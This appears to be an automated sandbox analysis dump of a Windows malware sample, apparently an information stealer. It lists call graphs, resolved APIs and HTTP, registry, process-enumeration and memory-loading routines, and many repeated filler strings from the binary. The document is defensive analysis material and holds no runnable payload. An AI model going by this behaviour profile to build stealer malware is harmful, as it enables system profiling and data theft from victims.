15240 bda8a0 lstrcpy 15239->15240 15241 bd23ab 15240->15241 15801 bd81f0 15241->15801 15243 bd23c2 15244 bda920 3 API calls 15243->15244 15245 bd23d5 15244->15245 15246 bda8a0 lstrcpy 15245->15246 15247 bd23de 15246->15247 15248 bda9b0 4 API calls 15247->15248 15249 bd240a 15248->15249 15250 bda8a0 lstrcpy 15249->15250 15251 bd2413 15250->15251 15252 bda9b0 4 API calls 15251->15252 15253 bd2432 15252->15253 15254 bda8a0 lstrcpy 15253->15254 15255 bd243b 15254->15255 15256 bda9b0 4 API calls 15255->15256 15257 bd245c 15256->15257 15258 bda8a0 lstrcpy 15257->15258 15259 bd2465 15258->15259 15260 bda9b0 4 API calls 15259->15260 15261 bd2484 15260->15261 15262 bda8a0 lstrcpy 15261->15262 15263 bd248d 15262->15263 15264 bda9b0 4 API calls 15263->15264 15265 bd24ae 15264->15265 15266 bda8a0 lstrcpy 15265->15266 15267 bd24b7 15266->15267 15809 bd8320 15267->15809 15269 bd24d3 15270 bda920 3 API calls 15269->15270 15271 bd24e6 15270->15271 15272 bda8a0 lstrcpy 15271->15272 15273 bd24ef 15272->15273 15274 bda9b0 4 API calls 15273->15274 15275 bd2519 15274->15275 15276 bda8a0 lstrcpy 15275->15276 15277 bd2522 15276->15277 15278 bda9b0 4 API calls 15277->15278 15279 bd2543 15278->15279 15280 bda8a0 lstrcpy 15279->15280 15281 bd254c 15280->15281 15282 bd8320 17 API calls 15281->15282 15283 bd2568 15282->15283 15284 bda920 3 API calls 15283->15284 15285 bd257b 15284->15285 15286 bda8a0 lstrcpy 15285->15286 15287 bd2584 15286->15287 15288 bda9b0 4 API calls 15287->15288 15289 bd25ae 15288->15289 15290 bda8a0 lstrcpy 15289->15290 15291 bd25b7 15290->15291 15292 bda9b0 4 API calls 15291->15292 15293 bd25d6 15292->15293 15294 bda8a0 lstrcpy 15293->15294 15295 bd25df 15294->15295 15296 bda9b0 4 API calls 15295->15296 15297 bd2600 15296->15297 15298 bda8a0 lstrcpy 15297->15298 15299 bd2609 15298->15299 15845 bd8680 15299->15845 15301 bd2620 15302 bda920 3 API calls 15301->15302 15303 bd2633 15302->15303 15304 bda8a0 lstrcpy 15303->15304 15305 bd263c 15304->15305 15306 bd265a lstrlen 15305->15306 15307 bd266a 15306->15307 15308 bda740 lstrcpy 15307->15308 15309 bd267c 15308->15309 15310 bc1590 lstrcpy 15309->15310 15311 bd268d 15310->15311 15855 bd5190 15311->15855 15313 bd2699 15313->13745 16043 bdaad0 15314->16043 15316 bc5009 InternetOpenUrlA 15320 bc5021 15316->15320 15317 bc502a InternetReadFile 15317->15320 15318 bc50a0 InternetCloseHandle InternetCloseHandle 15319 bc50ec 15318->15319 15319->13749 15320->15317 15320->15318 16044 bc98d0 15321->16044 15323 bd0759 15324 bd077d 15323->15324 15325 bd0a38 15323->15325 15327 bd0799 StrCmpCA 15324->15327 15326 bc1590 lstrcpy 15325->15326 15328 bd0a49 15326->15328 15330 bd07a8 15327->15330 15355 bd0843 15327->15355 16220 bd0250 15328->16220 15332 bda7a0 lstrcpy 15330->15332 15334 bd07c3 15332->15334 15333 bd0865 StrCmpCA 15335 bd0874 15333->15335 15373 bd096b 15333->15373 15336 bc1590 lstrcpy 15334->15336 15337 bda740 lstrcpy 15335->15337 15338 bd080c 15336->15338 15340 bd0881 15337->15340 15341 bda7a0 lstrcpy 15338->15341 15339 bd099c StrCmpCA 15342 bd09ab 15339->15342 15343 bd0a2d 15339->15343 15344 bda9b0 4 API calls 15340->15344 15345 bd0823 15341->15345 15347 bc1590 lstrcpy 15342->15347 15343->13753 15348 bd08ac 15344->15348 15346 bda7a0 lstrcpy 15345->15346 15349 bd083e 15346->15349 15350 bd09f4 15347->15350 15351 bda920 3 API calls 15348->15351 16047 bcfb00 15349->16047 15353 bda7a0 lstrcpy 15350->15353 15354 bd08b3 15351->15354 15356 bd0a0d 15353->15356 15357 bda9b0 4 API calls 15354->15357 15355->15333 15358 bda7a0 lstrcpy 15356->15358 15359 bd08ba 15357->15359 15361 bd0a28 15358->15361 15360 bda8a0 lstrcpy 15359->15360 15363 bd08c3 15360->15363 16163 bd0030 15361->16163 15373->15339 15695 bda7a0 lstrcpy 15694->15695 15696 bc1683 15695->15696 15697 bda7a0 lstrcpy 15696->15697 15698 bc1695 15697->15698 15699 bda7a0 lstrcpy 15698->15699 15700 bc16a7 15699->15700 15701 bda7a0 lstrcpy 15700->15701 15702 bc15a3 15701->15702 15702->14576 15704 bc47c6 15703->15704 15705 bc4838 lstrlen 15704->15705 15729 bdaad0 15705->15729 15707 bc4848 InternetCrackUrlA 15708 bc4867 15707->15708 15708->14653 15710 bda740 lstrcpy 15709->15710 15711 bd8b74 15710->15711 15712 bda740 lstrcpy 15711->15712 15713 bd8b82 GetSystemTime 15712->15713 15715 bd8b99 15713->15715 15714 bda7a0 lstrcpy 15716 bd8bfc 15714->15716 15715->15714 15716->14668 15718 bda931 15717->15718 15719 bda988 15718->15719 15721 bda968 lstrcpy lstrcat 15718->15721 15720 bda7a0 lstrcpy 15719->15720 15722 bda994 15720->15722 15721->15719 15722->14671 15723->14786 15725 bc9af9 LocalAlloc 15724->15725 15726 bc4eee 15724->15726 15725->15726 15727 bc9b14 CryptStringToBinaryA 15725->15727 15726->14674 15726->14677 15727->15726 15728 bc9b39 LocalFree 15727->15728 15728->15726 15729->15707 15730->14796 15731->14937 15732->14939 15733->14947 15862 bd77a0 15734->15862 15737 bd76c6 RegOpenKeyExA 15739 bd7704 RegCloseKey 15737->15739 15740 bd76e7 RegQueryValueExA 15737->15740 15738 bd1c1e 15738->15029 15739->15738 15740->15739 15742 bd1c99 15741->15742 15742->15043 15744 bd1e09 15743->15744 15744->15085 15746 bd7a9a wsprintfA 15745->15746 15747 bd1e84 15745->15747 15746->15747 15747->15099 15749 bd7b4d 15748->15749 15750 bd1efe 15748->15750 15869 bd8d20 LocalAlloc CharToOemW 15749->15869 15750->15113 15753 bda740 lstrcpy 15752->15753 15754 bd7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15753->15754 15763 bd7c25 15754->15763 15755 bd7d18 15757 bd7d1e LocalFree 15755->15757 15758 bd7d28 15755->15758 15756 bd7c46 GetLocaleInfoA 15756->15763 15757->15758 15759 bda7a0 lstrcpy 15758->15759 15760 bd7d37 15759->15760 15760->15126 15761 bda8a0 lstrcpy 15761->15763 15762 bda9b0 lstrcpy lstrlen lstrcpy lstrcat 15762->15763 15763->15755 15763->15756 15763->15761 15763->15762 15765 bd2008 15764->15765 15765->15141 15767 bd94b5 15766->15767 15768 bd9493 GetModuleFileNameExA CloseHandle 15766->15768 15769 bda740 lstrcpy 15767->15769 15768->15767 15770 bd2091 15769->15770 15770->15156 15772 bd7e68 RegQueryValueExA 15771->15772 15773 bd2119 15771->15773 15774 bd7e8e RegCloseKey 15772->15774 15773->15170 15774->15773 15776 bd7fb9 GetLogicalProcessorInformationEx 15775->15776 15777 bd7fd8 GetLastError 15776->15777 15782 bd8029 15776->15782 15780 bd8022 15777->15780 15787 bd7fe3 15777->15787 15781 bd2194 15780->15781 15784 bd89f0 2 API calls 15780->15784 15781->15184 15783 bd89f0 2 API calls 15782->15783 15785 bd807b 15783->15785 15784->15781 15785->15780 15786 bd8084 wsprintfA 15785->15786 15786->15781 15787->15776 15787->15781 15870 bd89f0 15787->15870 15873 bd8a10 GetProcessHeap RtlAllocateHeap 15787->15873 15789 bd220f 15788->15789 15789->15198 15791 bd89b0 15790->15791 15792 bd814d GlobalMemoryStatusEx 15791->15792 15793 bd8163 __aulldiv 15792->15793 15794 bd819b wsprintfA 15793->15794 15795 bd2289 15794->15795 15795->15212 15797 bd87fb GetProcessHeap RtlAllocateHeap wsprintfA 15796->15797 15799 bda740 lstrcpy 15797->15799 15800 bd230b 15799->15800 15800->15226 15802 bda740 lstrcpy 15801->15802 15803 bd8229 15802->15803 15804 bd8263 15803->15804 15807 bda9b0 lstrcpy lstrlen lstrcpy lstrcat 15803->15807 15808 bda8a0 lstrcpy 15803->15808 15805 bda7a0 lstrcpy 15804->15805 15806 bd82dc 15805->15806 15806->15243 15807->15803 15808->15803 15810 bda740 lstrcpy 15809->15810 15811 bd835c RegOpenKeyExA 15810->15811 15812 bd83ae 15811->15812 15813 bd83d0 15811->15813 15814 bda7a0 lstrcpy 15812->15814 15815 bd83f8 RegEnumKeyExA 15813->15815 15816 bd8613 RegCloseKey 15813->15816 15826 bd83bd 15814->15826 15817 bd843f wsprintfA RegOpenKeyExA 15815->15817 15818 bd860e 15815->15818 15819 bda7a0 lstrcpy 15816->15819 15820 bd8485 RegCloseKey RegCloseKey 15817->15820 15821 bd84c1 RegQueryValueExA 15817->15821 15818->15816 15819->15826 15824 bda7a0 lstrcpy 15820->15824 15822 bd84fa lstrlen 15821->15822 15823 bd8601 RegCloseKey 15821->15823 15822->15823 15825 bd8510 15822->15825 15823->15818 15824->15826 15827 bda9b0 4 API calls 15825->15827 15826->15269 15828 bd8527 15827->15828 15829 bda8a0 lstrcpy 15828->15829 15830 bd8533 15829->15830 15831 bda9b0 4 API calls 15830->15831 15832 bd8557 15831->15832 15833 bda8a0 lstrcpy 15832->15833 15834 bd8563 15833->15834 15835 bd856e RegQueryValueExA 15834->15835 15835->15823 15836 bd85a3 15835->15836 15837 bda9b0 4 API calls 15836->15837 15838 bd85ba 15837->15838 15839 bda8a0 lstrcpy 15838->15839 15840 bd85c6 15839->15840 15841 bda9b0 4 API calls 15840->15841 15842 bd85ea 15841->15842 15843 bda8a0 lstrcpy 15842->15843 15844 bd85f6 15843->15844 15844->15823 15846 bda740 lstrcpy 15845->15846 15847 bd86bc CreateToolhelp32Snapshot Process32First 15846->15847 15848 bd875d CloseHandle 15847->15848 15849 bd86e8 Process32Next 15847->15849 15850 bda7a0 lstrcpy 15848->15850 15849->15848 15854 bd86fd 15849->15854 15853 bd8776 15850->15853 15851 bda9b0 lstrcpy lstrlen lstrcpy lstrcat 15851->15854 15852 bda8a0 lstrcpy 15852->15854 15853->15301 15854->15849 15854->15851 15854->15852 15856 bda7a0 lstrcpy 15855->15856 15857 bd51b5 15856->15857 15858 bc1590 lstrcpy 15857->15858 15859 bd51c6 15858->15859 15874 bc5100 15859->15874 15861 bd51cf 15861->15313 15865 bd7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15862->15865 15864 bd76b9 15864->15737 15864->15738 15866 bd7765 RegQueryValueExA 15865->15866 15867 bd7780 RegCloseKey 15865->15867 15866->15867 15868 bd7793 15867->15868 15868->15864 15869->15750 15871 bd8a0c 15870->15871 15872 bd89f9 GetProcessHeap HeapFree 15870->15872 15871->15787 15872->15871 15873->15787 15875 bda7a0 lstrcpy 15874->15875 15876 bc5119 15875->15876 15877 bc47b0 2 API calls 15876->15877 15878 bc5125 15877->15878 16034 bd8ea0 15878->16034 15880 bc5184 15881 bc5192 lstrlen 15880->15881 15882 bc51a5 15881->15882 15883 bd8ea0 4 API calls 15882->15883 15884 bc51b6 15883->15884 15885 bda740 lstrcpy 15884->15885 15886 bc51c9 15885->15886 15887 bda740 lstrcpy 15886->15887 15888 bc51d6 15887->15888 15889 bda740 lstrcpy 15888->15889 15890 bc51e3 15889->15890 15891 bda740 lstrcpy 15890->15891 15892 bc51f0 15891->15892 15893 bda740 lstrcpy 15892->15893 15894 bc51fd InternetOpenA StrCmpCA 15893->15894 15895 bc522f 15894->15895 15896 bc58c4 InternetCloseHandle 15895->15896 15897 bd8b60 3 API calls 15895->15897 15903 bc58d9 codecvt 15896->15903 15898 bc524e 15897->15898 15899 bda920 3 API calls 15898->15899 15900 bc5261 15899->15900 15901 bda8a0 lstrcpy 15900->15901 15902 bc526a 15901->15902 15904 bda9b0 4 API calls 15902->15904 15907 bda7a0 lstrcpy 15903->15907 15905 bc52ab 15904->15905 15906 bda920 3 API calls 15905->15906 15908 bc52b2 15906->15908 15915 bc5913 15907->15915 15909 bda9b0 4 API calls 15908->15909 15910 bc52b9 15909->15910 15911 bda8a0 lstrcpy 15910->15911 15912 bc52c2 15911->15912 15913 bda9b0 4 API calls 15912->15913 15914 bc5303 15913->15914 15916 bda920 3 API calls 15914->15916 15915->15861 15917 bc530a 15916->15917 15918 bda8a0 lstrcpy 15917->15918 15919 bc5313 15918->15919 15920 bc5329 InternetConnectA 15919->15920 15920->15896 15921 bc5359 HttpOpenRequestA 15920->15921 15923 bc58b7 InternetCloseHandle 15921->15923 15924 bc53b7 15921->15924 15923->15896 15925 bda9b0 4 API calls 15924->15925 15926 bc53cb 15925->15926 15927 bda8a0 lstrcpy 15926->15927 15928 bc53d4 15927->15928 15929 bda920 3 API calls 15928->15929 15930 bc53f2 15929->15930 15931 bda8a0 lstrcpy 15930->15931 15932 bc53fb 15931->15932 15933 bda9b0 4 API calls 15932->15933 15934 bc541a 15933->15934 15935 bda8a0 lstrcpy 15934->15935 15936 bc5423 15935->15936 15937 bda9b0 4 API calls 15936->15937 15938 bc5444 15937->15938 15939 bda8a0 lstrcpy 15938->15939 15940 bc544d 15939->15940 15941 bda9b0 4 API calls 15940->15941 15942 bc546e 15941->15942 15943 bda8a0 lstrcpy 15942->15943 16035 bd8ead CryptBinaryToStringA 16034->16035 16036 bd8ea9 16034->16036 16035->16036 16037 bd8ece GetProcessHeap RtlAllocateHeap 16035->16037 16036->15880 16037->16036 16038 bd8ef4 codecvt 16037->16038 16039 bd8f05 CryptBinaryToStringA 16038->16039 16039->16036 16043->15316 16286 bc9880 16044->16286 16046 bc98e1 16046->15323 16048 bda740 lstrcpy 16047->16048 16049 bcfb16 16048->16049 16221 bda740 lstrcpy 16220->16221 16222 bd0266 16221->16222 16223 bd8de0 2 API calls 16222->16223 16224 bd027b 16223->16224 16225 bda920 3 API calls 16224->16225 16226 bd028b 16225->16226 16227 bda8a0 lstrcpy 16226->16227 16228 bd0294 16227->16228 16229 bda9b0 4 API calls 16228->16229 16230 bd02b8 16229->16230 16287 bc988e 16286->16287 16290 bc6fb0 16287->16290 16289 bc98ad codecvt 16289->16046 16293 bc6d40 16290->16293 16294 bc6d63 16293->16294 16306 bc6d59 16293->16306 16294->16306 16307 bc6660 16294->16307 16296 bc6dbe 16296->16306 16313 bc69b0 16296->16313 16298 bc6e2a 16299 bc6ee6 VirtualFree 16298->16299 16301 bc6ef7 16298->16301 16298->16306 16299->16301 16300 bc6f41 16304 bd89f0 2 API calls 16300->16304 16300->16306 16301->16300 16302 bc6f38 16301->16302 16303 bc6f26 FreeLibrary 16301->16303 16305 bd89f0 2 API calls 16302->16305 16303->16301 16304->16306 16305->16300 16306->16289 16310 bc668f VirtualAlloc 16307->16310 16309 bc6730 16311 bc673c 16309->16311 16312 bc6743 VirtualAlloc 16309->16312 16310->16309 16310->16311 16311->16296 16312->16311 16314 bc69c9 16313->16314 16318 bc69d5 16313->16318 16315 bc6a09 LoadLibraryA 16314->16315 16314->16318 16316 bc6a32 16315->16316 16315->16318 16320 bc6ae0 16316->16320 16323 bd8a10 GetProcessHeap RtlAllocateHeap 16316->16323 16318->16298 16319 bc6ba8 GetProcAddress 16319->16318 16319->16320 16320->16318 16320->16319 16321 bd89f0 2 API calls 16321->16320 16322 bc6a8b 16322->16318 16322->16321 16323->16322

                    Executed Functions

                    Function 00BD9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 660 bd9860-bd9874 call bd9750 663 bd987a-bd9a8e call bd9780 GetProcAddress * 21 660->663 664 bd9a93-bd9af2 LoadLibraryA * 5 660->664 663->664 665 bd9b0d-bd9b14 664->665 666 bd9af4-bd9b08 GetProcAddress 664->666 668 bd9b46-bd9b4d 665->668 669 bd9b16-bd9b41 GetProcAddress * 2 665->669 666->665 671 bd9b4f-bd9b63 GetProcAddress 668->671 672 bd9b68-bd9b6f 668->672 669->668 671->672 673 bd9b89-bd9b90 672->673 674 bd9b71-bd9b84 GetProcAddress 672->674 675 bd9bc1-bd9bc2 673->675 676 bd9b92-bd9bbc GetProcAddress * 2 673->676 674->673 676->675
                    APIs
                    • GetProcAddress.KERNEL32(74DD0000,013C2368), ref: 00BD98A1
                    • GetProcAddress.KERNEL32(74DD0000,013C24D0), ref: 00BD98BA
                    • GetProcAddress.KERNEL32(74DD0000,013C2338), ref: 00BD98D2
                    • GetProcAddress.KERNEL32(74DD0000,013C2500), ref: 00BD98EA
                    • GetProcAddress.KERNEL32(74DD0000,013C23E0), ref: 00BD9903
                    • GetProcAddress.KERNEL32(74DD0000,013C8FB8), ref: 00BD991B
                    • GetProcAddress.KERNEL32(74DD0000,013B5DF0), ref: 00BD9933
                    • GetProcAddress.KERNEL32(74DD0000,013B5BD0), ref: 00BD994C
                    • GetProcAddress.KERNEL32(74DD0000,013C2308), ref: 00BD9964
                    • GetProcAddress.KERNEL32(74DD0000,013C2248), ref: 00BD997C
                    • GetProcAddress.KERNEL32(74DD0000,013C2410), ref: 00BD9995
                    • GetProcAddress.KERNEL32(74DD0000,013C2278), ref: 00BD99AD
                    • GetProcAddress.KERNEL32(74DD0000,013B5AF0), ref: 00BD99C5
                    • GetProcAddress.KERNEL32(74DD0000,013C23F8), ref: 00BD99DE
                    • GetProcAddress.KERNEL32(74DD0000,013C2470), ref: 00BD99F6
                    • GetProcAddress.KERNEL32(74DD0000,013B5BF0), ref: 00BD9A0E
                    • GetProcAddress.KERNEL32(74DD0000,013C24B8), ref: 00BD9A27
                    • GetProcAddress.KERNEL32(74DD0000,013C22A8), ref: 00BD9A3F
                    • GetProcAddress.KERNEL32(74DD0000,013B5E10), ref: 00BD9A57
                    • GetProcAddress.KERNEL32(74DD0000,013C22D8), ref: 00BD9A70
                    • GetProcAddress.KERNEL32(74DD0000,013B5B50), ref: 00BD9A88
                    • LoadLibraryA.KERNEL32(013C25A8,?,00BD6A00), ref: 00BD9A9A
                    • LoadLibraryA.KERNEL32(013C25C0,?,00BD6A00), ref: 00BD9AAB
                    • LoadLibraryA.KERNEL32(013C2530,?,00BD6A00), ref: 00BD9ABD
                    • LoadLibraryA.KERNEL32(013C2560,?,00BD6A00), ref: 00BD9ACF
                    • LoadLibraryA.KERNEL32(013C2548,?,00BD6A00), ref: 00BD9AE0
                    • GetProcAddress.KERNEL32(75A70000,013C25D8), ref: 00BD9B02
                    • GetProcAddress.KERNEL32(75290000,013C2518), ref: 00BD9B23
                    • GetProcAddress.KERNEL32(75290000,013C2578), ref: 00BD9B3B
                    • GetProcAddress.KERNEL32(75BD0000,013C2590), ref: 00BD9B5D
                    • GetProcAddress.KERNEL32(75450000,013B5B10), ref: 00BD9B7E
                    • GetProcAddress.KERNEL32(76E90000,013C9008), ref: 00BD9B9F
                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00BD9BB6
                    Strings
                    • NtQueryInformationProcess, xrefs: 00BD9BAA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: NtQueryInformationProcess
                    • API String ID: 2238633743-2781105232
                    • Opcode ID: db32073bff4343b8057715e6bc16e648daf954875e98fba18ec33a2a55c7f207
                    • Instruction ID: 30329abe89334b064a79ee49ac01023e2fb57f49d147213ce8535b8aceef4820
                    • Opcode Fuzzy Hash: db32073bff4343b8057715e6bc16e648daf954875e98fba18ec33a2a55c7f207
                    • Instruction Fuzzy Hash: AEA11DB55103489FD348EFAAFD8895637F9F74C30171C853BA605A3268D63B98C9CB62
                    Function 00BC45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 764 bc45c0-bc4695 RtlAllocateHeap 781 bc46a0-bc46a6 764->781 782 bc46ac-bc474a 781->782 783 bc474f-bc47a9 VirtualProtect 781->783 782->781
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BC460F
                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00BC479C
                    Strings
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC473F
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC45F3
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC477B
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC45DD
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC4678
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC4662
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC46C2
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC4734
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC466D
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC46B7
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC4622
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC4770
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC4643
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC45C7
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC475A
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC4617
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC4638
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC4657
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC45E8
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC4713
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC46AC
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC462D
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC4729
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC474F
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC4765
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC46CD
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC471E
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC46D8
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC4683
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC45D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeapProtectVirtual
                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United 